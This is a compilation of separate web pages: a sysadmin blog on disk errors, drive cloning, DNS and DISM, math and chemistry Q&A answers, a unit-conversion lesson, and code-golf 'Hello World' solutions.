Num  Test_Description  Status                   Remaining  LifeTime(hours)  LBA_of_first_error
# 1  Short offline     Completed: read failure  10%        44084            976766499

So we have to find the filesystem. Usually it would be:

# fdisk -lu /dev/sda

I get:

Disk /dev/sda: 500.1 GB, 500107862016 bytes
255 heads, 63 sectors/track, 60801 cylinders, total 976773168 sectors
Units = sectors of 1 * 512 = 512 bytes
Device Boot      Start        End     Blocks  Id  System
/dev/sda1 *          1     208769    104384+  fd  Linux raid autodetect
Partition 1 does not end on cylinder boundary.
/dev/sda2       208770  976768063  488279647  fd  Linux raid autodetect

Using: ((976766499 - 208770) * 512) / 4096

We get: LBA block 122069716.

But wait, the filesystem isn't on sda, it's on /dev/main/root. Here's how:

# cat /etc/fstab

/dev/main/root  /      ext3  usrquota,grpquota  1 1
/dev/md1        /boot  ext3  defaults           1 2
/dev/main/swap  swap   swap  defaults           0 0

So we know the filesystem is mounted at /dev/main/root and it is ext3 type. We can find the BLOCK SIZE by:

# tune2fs -l /dev/main/root | grep Block

I get:

Block count:              121561088
Block size:               4096
Blocks per group:         32768

We're still at LBA block 122069716. Or specifically 122069716.125, i.e. the second of 8 sectors in this block.
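The LBA-to-filesystem-block arithmetic above can be sketched as a small helper (a sketch in Python; the sector size of 512 and the block size of 4096 come from the fdisk and tune2fs output above, and the function name is my own):

```python
# Map a failing absolute LBA (from the SMART self-test log) to an
# ext3 filesystem block number, given the partition's starting LBA.
SECTOR_SIZE = 512   # bytes per sector, from the fdisk output
BLOCK_SIZE = 4096   # bytes per filesystem block, from the tune2fs output

def lba_to_fs_block(error_lba, partition_start_lba):
    # Offset of the bad sector within the partition, in bytes,
    # divided by the filesystem block size.
    byte_offset = (error_lba - partition_start_lba) * SECTOR_SIZE
    return byte_offset / BLOCK_SIZE

# Values from the smartctl and fdisk output above.
print(lba_to_fs_block(976766499, 208770))  # 122069716.125
```

The fractional part (.125 = 1/8) is what tells you the failing sector is the second of the eight 512-byte sectors making up that 4096-byte block.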
We can test the block by:

# debugfs
debugfs 1.39 (29-May-2006)
debugfs:  open /dev/main/root
debugfs:  testb 122069716
Illegal block number passed to ext2fs_test_block_bitmap #122069716 for block bitmap for /dev/main/root
Block 122069716 not in use
debugfs:  quit

In short, it looks like this:
==================================================================
sda1 sdb1 | md1
sda2 sdb2 | md2 | pv (md2) | vg (main)
                              /          \
                       lv (main/root)  lv (main/swap)

Transfer Hard Drive to New Hardware

Transfer a hard drive to new hardware. It can be done.
• -take note of the current BIOS setting for the ATA, AHCI, RAID setup.
• -run c:\windows\system32\sysprep\sysprep.exe
• -click GENERALIZE
• -wait an hour and let it shut down.
• -transfer to new hardware.
• -boot pc
• -change BIOS to match the old setup.
• -wait for it to boot

All of your stuff should be intact. If for some reason that doesn't work, you can always load the drivers into Windows in an offline manner.
• -find your motherboard model number.
• -download the drivers.
• -extract them to the C drive (for example: c:\drivers\chipset)
• -boot into REPAIR MODE or start with WINDOWS OS INSTALL media (usb, CD, PXE, etc).
• -click REPAIR YOUR COMPUTER (bottom-left).
• -click COMMAND PROMPT.
• -find what letter your WINDOWS-DIRECTORY is.
• -type: dism /image:c:\ /add-driver /Driver:e:\install\chipset\ /recurse
• -hit ENTER
• -type EXIT
• -reboot

DNS Servers

I love DNS servers. I really do. You ask a question, they give an answer. Here are some of the more popular ones.

4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5
8.8.8.8
8.8.4.4
137.65.1.1
137.65.1.2
137.65.1.3
75.75.75.75
75.75.76.76

OPENDNS SERVERS
208.67.222.222
208.67.220.220

You can use OPENDNS as a web content filtering tool to automatically block inappropriate content and keep children safe.

To ask a question you can use DIG (*nix) or NSLOOKUP (Windows). I prefer DIG and install it on Windows rather easily via GNUWIN.
• -open a shell of some kind (putty, command, power, etc)
• -type: dig daknetworks.com
• -type: nslookup daknetworks.com

To ask a question of a specific server:
• -type: dig daknetworks.com @4.2.2.2
• -type: nslookup daknetworks.com 4.2.2.2

To ask for a specific type of record:
• -type: dig -t mx daknetworks.com
• -type: nslookup -type=mx daknetworks.com

To ask for an authoritative record:
• -type: dig -t ns daknetworks.com
• -type: nslookup -type=soa daknetworks.com

To ask for all the info:
• -type: nslookup -debug daknetworks.com 1.2.3.4

Clone MacBook Pro Hard Drive With Boot Camp

I have a 128GB SSD HD and I want to upgrade to a newly acquired 512GB SSD HD. How do I upgrade my ssd hard drive to a larger ssd hard drive on my MacBook Pro?
ps- I have Boot Camp with a Windows partition.
pss- many posts claim this can't be done or post a really, really long and complicated instruction set. Don't believe them. ;-)

• -clone the drive (clonezilla).
• -resize the Windows Boot Camp partition (gparted).
• -sync the partition tables (gptsync).
• -resize the OSX partition (diskutil).
• -fix the Windows bootloader (Windows).

NEEDED
-usb with ubcd with parted magic (UBCD is universal boot cd).
-host system.
-Windows 7/8 cd/usb (or a Windows repair disk).

CLONE
-plug both ssd's into the host system.
-boot via usb.
-start parted-magic.
-start clonezilla
-clone disk to disk
-wait till finished (this could take awhile)

MOVE/RESIZE WINDOWS PARTITION
-you should still be in parted-magic
-start gparted
-resize the windows partition as needed (grab the handles)
-move the windows partition to the end
-move the osx recovery boot loader next to the windows partition
-apply changes
-wait
-after it's finished, if needed, you can fix the filesystem for both OSX and WINDOWS.

SYNC FOR BOOT CAMP
-you should still be in parted-magic
-open terminal
-type: sudo gptsync /dev/sda (or other device such as sdb, sdc, sdd; gparted will show you).
-confirm Y
-shutdown

RESIZE OSX PARTITION
-boot into os x with the new, larger hd.
-open Disk Utility.
-click the disk on the left hand side.
-click the PARTITION button (at the top).
-select the volume you want to grow.
-look at the info-window (at the bottom).
-note the Disk Identifier (mine was disk0s2).
-open Terminal.
-type the following command: diskutil resizeVolume /dev/disk0s2 limits
-it will show the current size, minimum size and maximum size.
-note the maximum size (mine was 254.2GB. Do not get the part in parentheses.)
-type the following command: sudo diskutil resizeVolume /dev/disk0s2 254.2GB
(NOTE: the number above requires a GB but no space.)
-wait.
-shutdown

FIX THE WINDOWS BOOTLOADER
This also works if you get messages like "No boot device found" etc. This happens when the items get fouled up. How do you know if items are fouled up? Boot the MacBook Pro to Windows either:
-by holding the OPTION key on boot up (after the chime), or
-by booting into OSX, going to SYSTEM-PREFERENCES and choosing the START-UP DISK.
-you will see "No boot device", or Windows goes into repair mode on its own.

In either case, the following will work as a full instruction set. Adjust as needed.
-insert Windows 7/8 cd/usb (or a Windows repair disk).
-boot while holding the OPTION key.
-wait for the windows 7 cd/usb to show (it could take a minute).
-select Windows 7.
-click NEXT.
-select REPAIR YOUR COMPUTER (bottom left).
-click NO (for automatic repair).
-click NEXT (at bottom right).
-click COMMAND PROMPT.
-type: bootrec /scanos (if it isn't already there, it should find the WINDOWS installation and ask if you want to add it.)
-type: Y
-type: Diskpart
-type: LIST DISK
-type: SELECT DISK 0 (change this to the number of the disk; most likely 0)
-type: LIST PARTITION
-type: SELECT PARTITION 4 (change this to your partition number; most likely 4)
-type: DETAIL PARTITION (it will show the details of the partition. We're trying to find the partition with the windows installation.)
-if you found it, it will probably say ACTIVE: NO
-type: ACTIVE
-type: EXIT
-type: bootrec /fixmbr (needed?)
-type: bootrec /fixboot (needed?)
-type: bootrec /rebuildbcd
-type: exit
-click RESTART

CHECKDISK
-when it restarts it will do a chkdsk.
-let it finish.
-it will reboot.
-voila! You can Boot Camp Windows!

For diagnostic information, this is provided.
-boot to osx
-open terminal
-type: diskutil list
-type: sudo gpt -r -vv show disk0
-type: sudo fdisk /dev/disk0

DEFINITIONS
boot manager: manages your booting process. This can actually be changed to REFIND, PLOP, LILO, GRUB2 and a few others. Fun stuff! Not for the faint of heart! (see here for boot loaders https://en.wikipedia.org/wiki/Comparison_of_boot_loaders)
boot loader: loads an OS kernel and hands off control of the computer to that kernel.

      /--bl-->k-->osx
bm--|--bl-->k-->centos/rhel
      \--bl-->k-->win7/8/10

NOTES:

Intel Rapid Storage Technology (RST) (IRST)

I was going to write a blog post about SATA, AHCI, RAID, RST, IRST, ICH10R, X58 and the drivers needed, along with the settings and the difference between the drivers and the software, but this post does a better job than I ever would be able to (as well as a better explanation than Intel gives too):

I will say that the SATA/AHCI/RAID/IRST drivers are driving the southbridge (ICH10R, etc), which is the HOST-CONTROLLER (aka DISK-CONTROLLER aka STORAGE-CONTROLLER), and that the CHIPSET drivers are driving the northbridge (X58, etc).

Also, I will say that the speed of SATA-I (150MB), SATA-II (300MB) or SATA-III (600MB) depends on both the HARD-DRIVE itself and the HOST-CONTROLLER. The easy ways to find the HOST-CONTROLLER speed are by using CPUID or HWINFO.

Lastly, I'll say that you only need the RST if you are running in AHCI or RAID mode. If not, then you can use the chipset drivers.

Quickbooks 2011 on Mac El Capitan

Don't believe QUICKBOOKS support when they tell you that you have to upgrade to the newest version of QUICKBOOKS for MAC.
QUICKBOOKS 2011 will work fine. In the spirit of "just fix it", here's how:

Windows Package Manager

You're familiar with RPM. Windows has something similar, for Windows packages only. It should be called WPM for Windows Package Manager, but it's called DISM for Deployment Image Servicing and Management.

<tirade>Can they not come up with something all by themselves that works? Must they continuously rip off open-source projects and change a certain percentage so that they can get around the law? Then be so terrible at implementation that it would be graded as a D project?</tirade>

Show all Windows packages:
dism /online /get-packages /Format:Table

Find if a certain package is installed:
dism /online /get-packages | findstr KB2919355

Remove package:

Scan to see if there is corruption:
dism /online /cleanup-image /scanhealth

Report if there is corruption:
dism /online /cleanup-image /checkhealth

Repair if there is corruption:
dism /online /cleanup-image /restorehealth

Restore using a source image:
dism /online /cleanup-image /restorehealth /source:wim:d:\your\source\here\install.wim:1 /limitaccess

Remove old versions of packages:
dism /online /cleanup-image /startcomponentcleanup

Lock in all packages and service packs so that they cannot be uninstalled:
dism /online /cleanup-image /startcomponentcleanup /resetbase

Check to see if you have bad sectors on a disk:
• -use HDTUNE

This will give a graphical representation of any bad sectors on the disk. It will mark them as red. If you have bad sectors, it isn't the end of the world. We can mark them as bad so that those sectors won't be used any more. If you have 1-9 bad sectors, this isn't a problem. If you have more than 9, then most likely the issue will grow. More bad sectors will show and then the drive will become useless.

Fix bad sectors on a disk:
• -use UBCD > HDD > DIAGNOSTICS > HDAT2
• -type: HDAT2
• -select the disk by using the arrow keys on the keyboard.
• -hit ENTER.
• -select VERIFY/WRITE/VERIFY
• -let it run all the way through.

In my experience, if too many bad sectors happen, it's easier to clone the drive and move on with the data loss. At that point, the data might be able to be replaced/repaired. Cloning can be done with Clonezilla or many other tools. I prefer DDRESCUE, as in this article.

Again, there are so many tools in this area, like DATA-LIFEGUARD, SEATOOLS, CRYSTALDISKINFO, etc, that it's hard to know what to use and what not to bother with. The above reference of:
• HDTUNE
• HDAT2
• DDRESCUE
is a good start.

I wish I retained all the info I've learned and used in the past, but most of it escapes me now. No doubt that a data expert will have his or her own choice set of tools. I'd love to hear about them!
https://socratic.org/questions/how-do-you-solve-sqrt-2a-2-121-a-and-check-your-solution
How do you solve sqrt(2a^2-121)=a and check your solution?

Jan 26, 2017

$a = 11$

Explanation:

$a = \sqrt{2 {a}^{2} - 121}$

Square both sides:

${a}^{2} = 2 {a}^{2} - 121$

Subtract ${a}^{2}$ from both sides and add $121$ to both sides:

${a}^{2} = 121$

Take the square root of both sides:

$a = \pm \sqrt{121} = \pm 11$

Now check each candidate. Squaring can introduce extraneous solutions, and the radical sign denotes the non-negative root, so $a$ must be non-negative:

For $a = 11$: $\sqrt{2 \times {11}^{2} - 121} = \sqrt{242 - 121} = \sqrt{121} = 11$, which matches.

For $a = -11$: the left side is still $\sqrt{121} = 11 \ne -11$, so $a = -11$ is extraneous.

Only $a = 11$ is a solution.
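A quick numeric check of the two candidate solutions (a sketch; the helper name is my own) confirms that only a = 11 satisfies the original equation, since the square root is non-negative:

```python
import math

def satisfies(a):
    # Original equation: sqrt(2*a^2 - 121) == a
    return math.sqrt(2 * a * a - 121) == a

print(satisfies(11))    # True
print(satisfies(-11))   # False: sqrt(121) is 11, not -11
```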
http://math.stackexchange.com/tags/stochastic-integrals/hot
# Tag Info

6

Consider $$X_t=a(t-1)+bt+(1-t)Y_t,\qquad Y_t=\int_{0}^{t}\frac{\mathrm dB_s}{1-s},$$ then $$\mathrm dY_t=\frac{\mathrm dB_t}{1-t},\qquad \mathrm dX_t=a\mathrm dt+b\mathrm dt+(1-t)\mathrm dY_t-Y_t\mathrm dt,$$ hence $$\mathrm dX_t=\mathrm dB_t+\left(a+b-\int_{0}^{t}\frac{\mathrm dB_s}{1-s}\right)\mathrm dt,$$ and $$\mathrm d\langle X\rangle_t=\mathrm dt.$$ Edit: In ...

3

Firstly, by the strong law of large numbers, the limit should exist. Consider $$\theta_k = \inf\{t\geq 0,\ W_t = k\pi\}.$$ Then the integral can be written as the sum of $\int_{\theta_{k}}^{\theta_{k+1}}\sin^2(W_s)\,ds$; we have $$\frac{1}{t}\int_0^t \sin^2(W_s)\,ds = \frac{\sum_{k=1}^{+\infty}1_{\theta_k < t}}{t} \cdots$$ ...

2

I just realized I can use the fact that for a Radon measure $\mu$ on $[0,1]$, $f(t) = \mu([0,t])$ is of finite variation. So in my question, if for $\omega$ in $\Omega_0$ with $P(\Omega_0) = 1$, $h(\cdot)(\omega)$ is a Radon measure on $[0,1]$, then $h([0,t]) = W_t$ is of finite variation. This is contradictory with the fact that Brownian motion has infinite ...

2

Let $X_t=\int_0^t s\,\mathrm dW_s$ and $Y_t=\int_0^t W_s\,\mathrm ds$, then $X_t+Y_t=tW_t$, hence $E(X_t\mid W_t)=tW_t-E(Y_t\mid W_t)$. Furthermore, $E(W_s\mid W_t)=sW_t/t$ for every $s$ in $(0,t)$, hence $$E(Y_t\mid W_t)=\int_0^t E(W_s\mid W_t)\,\mathrm ds=(W_t/t)\int_0^t s\,\mathrm ds=tW_t/2.$$ Thus, $E(X_t\mid ...

1

This follows from the following theorem:

Theorem: Let $(M_t,\mathcal{F}_t)_{t \geq 0}$ be a martingale such that the sample paths are (almost surely) continuous and of bounded variation. Then $M_t = M_0$ almost surely.

(For a proof see e.g. René Schilling/Lothar Partzsch: Brownian motion - An Introduction to Stochastic Processes.) Since $$M_t := ...
1

Hint: use the Itô formula in the form: $$d\left[\left(\alpha(t) +\int_0^t a_s\,dB_s\right) \left(\beta(t) + \int_0^t b_s\,dB_s\right)\right] \\= \left(\alpha(t)+\int_0^t a_s\,dB_s\right)\left(d\beta(t) + b_t\,dB_t\right) + \left( d\alpha(t) + a_t\,dB_t \right)\left(\beta(t) + \int_0^t b_s\,dB_s\right) + a_tb_t\,dt$$ where $\alpha,\beta:\Bbb R^+\to ...$

1

Let's assume that we are in the regime in which $V_t > 0$ for every $t>0$. Consider the sequence of stopping times $$\tau_n = \inf \left\{ t: V_t > n \right\}, \quad n \in \mathbf{N};$$ then, as you mentioned before, if we can show that $\tau_n \to \infty$ as $n \to \infty$ in probability, the result follows by standard localization: the expectation ...

1

It simply depends whether one wants to consider integrals with infinite time-horizon or not. Usually, stochastic integrals of the form $$\int_0^T K_s \, dW_s \tag{1}$$ are considered where $T<\infty$. In this case, $$\mathbb{E} \left[ \left( \int_0^T K_s \, dW_s \right)^2 \right] = \mathbb{E}\left( \int_0^T K_s^2 \, ds \right) \tag{2}$$ is called Itô's ...

1

Hi, as mentioned in my comment, the proof given does not allow us to conclude by localization. I have finally found a rigorous and elementary proof of the fact that a CIR process possesses moments of all orders, which is necessary to get the result (order 1 is enough for our need). First, two observations: by Yamada-Watanabe's theorem, the CIR's SDE ...

1

First of all, the statement $$dH_{n+1}(t,B_t) = H_n(t,B_t)$$ doesn't make sense. Or can you explain what you mean by it? I guess it should read $$dH_{n+1}(t,B_t) = H_n(t,B_t) \, dB_t;$$ at least that's what I'm going to prove in this answer.

Lemma 1: $$H_{n+1}(t,x) = \frac{x}{n+1} H_n(t,x) - \frac{t}{n+1} H_{n-1}(t,x). \tag{0}$$ Proof: Denote by ...
1

Hints: Recall that the independence of two stochastic processes $(M_t)_{t \geq 0}$ and $(N_t)_{t \geq 0}$ is equivalent to the independence of the corresponding canonical $\sigma$-algebras $\mathcal{F}_{\infty}^M$ and $\mathcal{F}_{\infty}^N$, $$\mathcal{F}_{\infty}^M := \sigma(M_s;\ s \geq 0).$$ Let $f$ be an $\mathcal{F}_t^M$-adapted process such that ...

1

Via the Itô integral, and using the Itô lemma (third and penultimate steps): $$\int_0^t \sin(B_u)\circ dB_u = \int_0^t \sin(B_u)\, dB_u +\frac{1}{2}\int_0^t d(\sin(B_u))\,dB_u = \int_0^t \sin(B_u)\, dB_u + \frac{1}{2}\int_0^t\left(\sin'(B_u)\, dB_u +\frac{1}{2}\sin''(B_u)\, du\right)dB_u = \int_0^t \sin(B_u)\, dB_u + \frac{1}{2}\int_0^t\sin'(B_u)\, du = ...$$

1

Hints: First, solve the homogeneous SDE $$dX_t = \delta \mu X_t \, dt + \delta X_t \, dB_t. \tag{1}$$ To this end, apply Itô's formula to $f(x) := \log x$ and $(X_t)_{t \geq 0}$. In order to solve the SDE $$dX_t = (1+\delta \mu X_t) \, dt + \delta X_t \, dB_t,$$ we use a variation of constants, i.e. we make the Ansatz $$X_t = Z_t X_t^0$$ where $X_t^0$ is a ...
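One of the answers above computes $E(X_t \mid W_t) = tW_t/2$ for $X_t = \int_0^t s\,\mathrm dW_s$. Since $X_t$ and $W_t$ are jointly Gaussian with mean zero, this is equivalent to $\mathrm{Cov}(X_t, W_t) = t^2/2$. A seeded Monte Carlo sketch (plain Python; the simulation details are my own, not from the answers) checks that covariance numerically:

```python
import random, math

def estimate_cov(t=1.0, n_steps=100, n_paths=20000, seed=42):
    """Estimate Cov(X_t, W_t) for X_t = int_0^t s dW_s by simulation."""
    rng = random.Random(seed)
    dt = t / n_steps
    sd = math.sqrt(dt)
    total = 0.0
    for _ in range(n_paths):
        x = w = 0.0
        for i in range(n_steps):
            dw = rng.gauss(0.0, sd)
            # Deterministic integrand, so midpoint evaluation is unbiased here.
            x += (i + 0.5) * dt * dw
            w += dw
        total += x * w  # E[X W] equals Cov(X, W) since both have mean zero
    return total / n_paths

print(estimate_cov())  # close to t^2 / 2 = 0.5
```

With $t = 1$ the estimate should land near $0.5$, matching the closed-form answer.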
https://stacks.math.columbia.edu/tag/0B72
Lemma 42.29.4. Let $(S, \delta )$ be as in Situation 42.7.1. Let $X$ be locally of finite type over $S$. Let $(\mathcal{L}, s, i : D \to X)$ be a triple as in Definition 42.28.1. Let $\mathcal{N}$ be an invertible $\mathcal{O}_ X$-module. Then $i^*(c_1(\mathcal{N}) \cap \alpha ) = c_1(i^*\mathcal{N}) \cap i^*\alpha$ in $\mathop{\mathrm{CH}}\nolimits _{k - 2}(D)$ for all $\alpha \in \mathop{\mathrm{CH}}\nolimits _ k(X)$.
https://chem.libretexts.org/Courses/UWMilwaukee/CHE_125%3A_GOB_Introductory_Chemistry/02%3A_Measurements_and_Density/2.07%3A_Solving_Multistep_Conversion_Problems
# 2.7: Solving Multistep Conversion Problems

## Multiple Conversions

Sometimes you will have to perform more than one conversion to obtain the desired unit. For example, suppose you want to convert 54.7 km into millimeters. We will set up a series of conversion factors so that each conversion factor produces the next unit in the sequence. We first convert the given amount in km to the base unit, which is meters. We know that 1,000 m = 1 km. Then we convert meters to mm, remembering that $$1\; \rm{mm}$$ = $$10^{-3}\; \rm{m}$$.

Concept Map

Calculation

\begin{align} 54.7 \; \cancel{\rm{km}} \times \dfrac{1,000 \; \cancel{\rm{m}}}{1\; \cancel{\rm{km}}} \times \dfrac{1\; \rm{mm}}{10^{-3} \; \cancel{\rm{m}}} & = 54,700,000 \; \rm{mm} \\ &= 5.47 \times 10^7\; \rm{mm} \end{align}

In each step, the previous unit is canceled and the next unit in the sequence is produced, each successive unit canceling out until only the unit needed in the answer is left.

Example $$\PageIndex{1}$$: Unit Conversion

Convert 58.2 ms to megaseconds in one multistep calculation.

SOLUTION

Steps for Problem Solving: Unit Conversion

Identify the "given" information and what the problem is asking you to "find."
Given: 58.2 ms
Find: Ms

List other known quantities:
$$1\; \rm{ms} = 10^{-3}\; \rm{s}$$
$$1\; \rm{Ms} = 10^6\; \rm{s}$$

Prepare a concept map

Calculate

\begin{align} 58.2 \; \cancel{\rm{ms}} \times \dfrac{10^{-3} \cancel{\rm{s}}}{1\; \cancel{\rm{ms}}} \times \dfrac{1\; \rm{Ms}}{1,000,000\; \cancel{ \rm{s}}} & =0.0000000582\; \rm{Ms} \nonumber\\ &= 5.82 \times 10^{-8}\; \rm{Ms}\nonumber \end{align}\nonumber

Neither conversion factor affects the number of significant figures in the final answer.

Example $$\PageIndex{2}$$: Unit Conversion

How many seconds are in a day?

Solution

Steps for Problem Solving: Unit Conversion

Identify the "given" information and what the problem is asking you to "find."
Given: 1 day
Find: s

List other known quantities:
1 day = 24 hours
1 hour = 60 minutes
1 minute = 60 seconds

Prepare a concept map

Calculate

$1 \: \text{d} \times \frac{24 \: \text{hr}}{1 \: \text{d}}\times \frac{60 \: \text{min}}{1 \: \text{hr}} \times \frac{60 \: \text{s}}{1 \: \text{min}} = 86,400 \: \text{s} \nonumber$

Exercise $$\PageIndex{1}$$

Perform each conversion in one multistep calculation.

1. 43.007 ng to kg
2. 1005 in to ft
3. 12 mi to km

Answers:
1. $$4.3007 \times 10^{-11}\; \rm{kg}$$
2. 83.75 ft
3. 19 km

Career Focus: Pharmacist

A pharmacist dispenses drugs that have been prescribed by a doctor. Although that may sound straightforward, pharmacists in the United States must hold a doctorate in pharmacy and be licensed by the state in which they work. Most pharmacy programs require four years of education in a specialty pharmacy school. Pharmacists must know a lot of chemistry and biology so they can understand the effects that drugs (which are chemicals, after all) have on the body. Pharmacists can advise physicians on the selection, dosage, interactions, and side effects of drugs. They can also advise patients on the proper use of their medications, including when and how to take specific drugs properly. Pharmacists can be found in drugstores, hospitals, and other medical facilities.

Curiously, an outdated name for pharmacist is chemist, which was used when pharmacists formerly did a lot of drug preparation, or compounding. In modern times, pharmacists rarely compound their own drugs, but their knowledge of the sciences, including chemistry, helps them provide valuable services in support of everyone's health.

A woman consulting with a pharmacist. This image was released by the National Cancer Institute, an agency part of the National Institutes of Health. (Public Domain; Rhoda Baer (Photographer) via NIH).
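The chained-factor pattern used in the examples above translates directly into a small helper (a sketch in Python, not part of the original page; the function name is my own):

```python
def convert(value, *factors):
    """Apply a chain of (numerator, denominator) conversion factors,
    as in the worked examples: each factor cancels the previous unit."""
    for top, bottom in factors:
        value *= top / bottom
    return value

# 54.7 km -> mm: km -> m (1000 m / 1 km), then m -> mm (1 mm / 10^-3 m)
print(convert(54.7, (1000, 1), (1, 1e-3)))   # about 54,700,000 mm

# 1 day -> seconds: day -> hr -> min -> s
print(convert(1, (24, 1), (60, 1), (60, 1)))  # 86400.0
```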
## Summary

In multistep conversion problems, the previous unit is canceled for each step and the next unit in the sequence is produced, each successive unit canceling out until only the unit needed in the answer is left.

## Contributors

• Henry Agnew (UC Davis)

2.7: Solving Multistep Conversion Problems is shared under a CC BY license and was authored, remixed, and/or curated by LibreTexts.
http://coderethinked.com/tags/row-number/
# Generating Sequence Numbers In LINQ Query In this post, we’ll see how to generate sequence numbers along with the data that we need in LINQ C#.
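The post demonstrates this with LINQ in C#; the same idea — pairing each element with a running sequence number while keeping the data alongside — can be illustrated in Python with `enumerate` (an analogue, not the post's code; the function name is my own):

```python
# Pair each item with a 1-based sequence number, keeping the data alongside.
def with_sequence_numbers(items, start=1):
    return [{"seq": i, "value": item} for i, item in enumerate(items, start)]

rows = with_sequence_numbers(["alice", "bob", "carol"])
print(rows)
# [{'seq': 1, 'value': 'alice'}, {'seq': 2, 'value': 'bob'}, {'seq': 3, 'value': 'carol'}]
```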
https://socratic.org/questions/why-does-sn2-favor-aprotic
# Why does SN2 favor aprotic?

Mar 26, 2016

It should be the other way round: an aprotic solvent favors ${\text{S}}_{N} 2$.

#### Explanation:

For ${\text{S}}_{N} 1$, the rate-determining step depends on the leaving group. The nucleophile does not play an important role.

For ${\text{S}}_{N} 2$, that is not the case. The more nucleophilic the nucleophile, the faster the reaction.

In protic solvents, the nucleophile is "trapped" in a cage of solvent molecules and becomes less nucleophilic. Consequently, the ${\text{S}}_{N} 2$ reaction occurs at a slower rate.

Hence, ${\text{S}}_{N} 2$ is favored in an aprotic environment, where there is less hindrance to the nucleophile.
https://codegolf.stackexchange.com/questions/1536/hello-world-0-0?page=4&tab=votes
Hello World 0.0! source: Dilbert, September 8, 1992 I'm hoping to add a new twist on the classic "Hello World!" program. Code a program that outputs Hello World! without: • String/Character literals • Numbers (any base) • Pre-built functions that return "Hello World!" • RegEx literals With the exceptions of "O" and 0. †"O" is capitalized, "o" is not acceptable. • One of [code-golf] and [code-challenge] please, not both. The point of these tags to to help people find questions with the rules they want to use. Essentially every question on this site should be a game of some kind or another. – dmckee Mar 11 '11 at 22:29 • -1 We've already had Obfuscated Hello World, and I think this challenge is too similar. I'd have cast a "close as duplicate" vote, if I weren't a mod. – Chris Jester-Young Mar 11 '11 at 22:35 • @zzzzBov: I don't think it's different enough to warrant another question in the "hello world" theme; a different theme would have been better. But, that's just my opinion. – Chris Jester-Young Mar 11 '11 at 23:39 • I think this is a fine code golf - and better than the prior one. – MtnViewMark Mar 12 '11 at 6:58 • Some people seem to assume that "O"* means they can have a string literal with any number of O’s, including zero. I don’t think that was the intention. Please clarify. – Timwi Mar 12 '11 at 21:12 PHP, 160 157 bytes no literals at all. Still wonder if it has golfing potential left: for(;$c=[$h=($f=($t=++$n+$n)+$t)+$f+$s=$f*$f*$f,$e=$s+$s/$t+$v=$f+$n--,$l=$e+$f+--$f,$l,$o=$l+$f,$s/=$t,$h+$v*$f,$o,$o+$f,$l,--$e,++$s][+$i++];)echo chr($c); creates an array with the ascii codes and loops through it to print the characters. Run with -nr or try it online. 
### Breakdown

```php
for(;$c=[$h=
($f=($t=++$n+$n)+$t)    # $n=1, $t=2, $f=4
+$f+$s=$f*$f*$f,        # H      $s=64, $h=72
$e=$s+$s/$t+$v=$f+$n--, # e      $n=0, $v=5, $e=101
$l=$e+$f+--$f,$l,       # ll     $f=3, $l=108
$o=$l+$f,               # o      $o=111
$s/=$t,                 # space  $s=32
$h+$v*$f,$o,            # Wo
$o+$f,$l,               # rl
--$e,                   # d      $e=100
++$s                    # !      $s=33
][+$i++];)              # loop through array
echo chr($c);           # print character
```

## F#, 103 bytes

```fsharp
let[<EntryPoint>]``Hello world!``a=System.Reflection.MethodBase.GetCurrentMethod().Name|>stdout.Write;0
```

Similar to some of the other answers here. The backtick characters around the method name are not literals; rather, they "delimit an identifier that would otherwise not be a legal identifier, such as a language keyword." (Source) They do make F# nice for writing tests, since you can give a test a long human-language name instead of a programming-language name.

## Forth (gforth), 38 bytes

```forth
: f name type ; f Hello space f World!
```

Try it online!

OR

```forth
name World! name Hello type space type
```

Try it online!

### Explanation

Uses the Forth built-in for processing code to convert the next word entered to a string, and then prints it.

```forth
: f        \ start a new word definition
  name     \ grabs the next word (space-delimited) from the input/code
  type     \ output the string on top of the stack
;          \ end word definition
f Hello    \ converts and outputs Hello, as name will grab Hello from the input before continuing
space      \ outputs a single space
f World!   \ converts World! to a string and outputs it
```

## C# (357)

```csharp
class H
{
    static void main()
    {
        Func<ConsoleKey, char> f = (k) => (char) k;
        Func<char, char> l = (c) => char.ToLower(c);
        Console.WriteLine(new[] {
            f(ConsoleKey.H), l(f(ConsoleKey.E)), l(f(ConsoleKey.L)), l(f(ConsoleKey.L)),
            l(f(ConsoleKey.O)), f(ConsoleKey.Spacebar), f(ConsoleKey.W), l(f(ConsoleKey.O)),
            l(f(ConsoleKey.R)), l(f(ConsoleKey.L)), l(f(ConsoleKey.D)), f(ConsoleKey.PageUp)
        });
    }
}
```

Golfed:

```csharp
class H{static void main(){Func<ConsoleKey,char>f=(k)=>(char)k;Func<char,char>l=(c)=>char.ToLower(c);Console.WriteLine(new[]{f(ConsoleKey.H),l(f(ConsoleKey.E)),l(f(ConsoleKey.L)),l(f(ConsoleKey.L)),l(f(ConsoleKey.O)),f(ConsoleKey.Spacebar),f(ConsoleKey.W),l(f(ConsoleKey.O)),l(f(ConsoleKey.R)),l(f(ConsoleKey.L)),l(f(ConsoleKey.D)),f(ConsoleKey.PageUp)});}}
```

• using C = System.ConsoleKey; would save a number of chars. – zzzzBov Jan 28 '14 at 22:55
• I don't think it will. Enum constants can only be referred to through the enum. – microbian Jan 28 '14 at 23:02
• Next time, please compile your programs before posting them. This needs a using System, and Main needs to be capitalized. However, the suggestion made by @zzzzBov is correct; you can use using C=System.ConsoleKey; to abbreviate the code massively. Furthermore, you can remove the parentheses around the lambda parameters. That takes it down to 275. – Timwi Feb 5 '14 at 0:48

## Ruby, 49 chars

```ruby
def Hello World!;puts __method__;end
Hello World!
```

The whitespace in the method name is a UTF-8 em space, a little wider than a normal space, which would be a syntax error.

## Stuck, 0 bytes

Yup, an empty program in Stuck prints Hello, World! I don't see any string literals or Regex here.

• standard loophole – zzzzBov Jan 22 '17 at 7:01
• Ok, let me start by explaining that I am the original poster of this challenge, so whatever I tell you can be considered "word of god" for this challenge. I'll follow that with the fact that I posted this challenge almost six years ago, and I was much less experienced.
Finally, per the FAQ, "The purpose of this question is to provide a repository of standard loopholes which may be assumed to be closed without the question-setter having to explicitly close them." With all of that said, they are absolutely forbidden for this challenge. – zzzzBov Jan 28 '17 at 16:58

## Windows Batch (17)

```batch
echo Hello World!
```

• Does Hello World! not qualify as a string literal here? Curious. – shadowtalker Jul 7 '14 at 22:11
